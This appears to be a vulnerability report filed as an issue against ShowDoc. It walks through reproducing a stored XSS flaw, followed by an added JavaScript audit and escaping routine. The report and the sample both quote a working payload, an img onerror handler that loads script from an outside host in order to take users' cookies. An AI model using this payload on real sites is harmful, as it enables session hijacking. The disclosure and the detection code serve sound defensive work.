
We found a stored xss vulnerability in ShowDoc #325

Closed
@farmsecHub


Hello friend, we are the farmsec security team, and we found a stored XSS vulnerability in ShowDoc:
1. Click to register
[image: xss1]
2. Fill in user information
[image: xss2]
Click to register.
3. Start a new project
[image: xss3]
Click new project.
4. Fill in the project information
[image: xss4]
Click submit.
5. Click on the new project
[image: xss5]
Click on the new project xss test
6. Click + to create a new page
[image: xss6]
7. Fill in the XSS vulnerability test payload
payload:
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xxe.im/peKD';>
Click save
[image: xss7]
Access page
[image: xss9]
8. Get the user's cookie information
[image: xss]
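
Added example, not part of the original report and not ShowDoc's code: a heuristic audit that flags stored page content carrying inline event handlers or other active HTML, such as the `onerror` attribute in the payload above, together with the output encoding that renders such content inert. The function names (`auditContent`, `escapeHtml`), the rule set and the benign sample are assumptions made for illustration.

```javascript
// Added example: heuristic audit of stored page content plus output encoding.
// The function names and the audit rules are assumptions, not ShowDoc code.
// This is an audit aid, not a sanitizer; encode on output regardless.

// A tag: name, then attributes where quoted values may contain '>'.
const TAG_RE = /<\s*([a-zA-Z][\w:-]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>/g;
// Inline event-handler attribute such as onerror= or onload=.
const HANDLER_RE = /(?:^|[\s/"'])(on[a-z]+)\s*=/gi;
// URL-bearing attribute whose value starts with a script-capable scheme.
const URL_ATTR_RE = /\b(?:src|href|action|formaction)\s*=\s*["']?\s*(?:javascript|data):/i;
const ACTIVE_TAGS = new Set(["script", "iframe", "object", "embed"]);

function auditContent(content) {
  const findings = [];
  for (const m of content.matchAll(TAG_RE)) {
    const tag = m[1].toLowerCase();
    const attrs = m[2];
    if (ACTIVE_TAGS.has(tag)) findings.push({ tag, reason: "active element" });
    for (const h of attrs.matchAll(HANDLER_RE)) {
      findings.push({ tag, reason: "event handler " + h[1].toLowerCase() });
    }
    if (URL_ATTR_RE.test(attrs)) findings.push({ tag, reason: "script-capable URL" });
  }
  return findings;
}

// Encode the five HTML-significant characters before writing text into a page.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Sample stored pages: the first is the payload quoted in the report,
// the second is constructed benign content.
const REPORTED = "<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xxe.im/peKD';>";
const BENIGN = 'API notes: use <b>POST</b> and see <a href="https://example.com/docs">docs</a>.';

for (const page of [REPORTED, BENIGN]) {
  console.log(auditContent(page), escapeHtml(page));
}
```

The audit is useful for finding pages already stored with active markup; it does not replace encoding or an allowlist sanitizer at render time.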
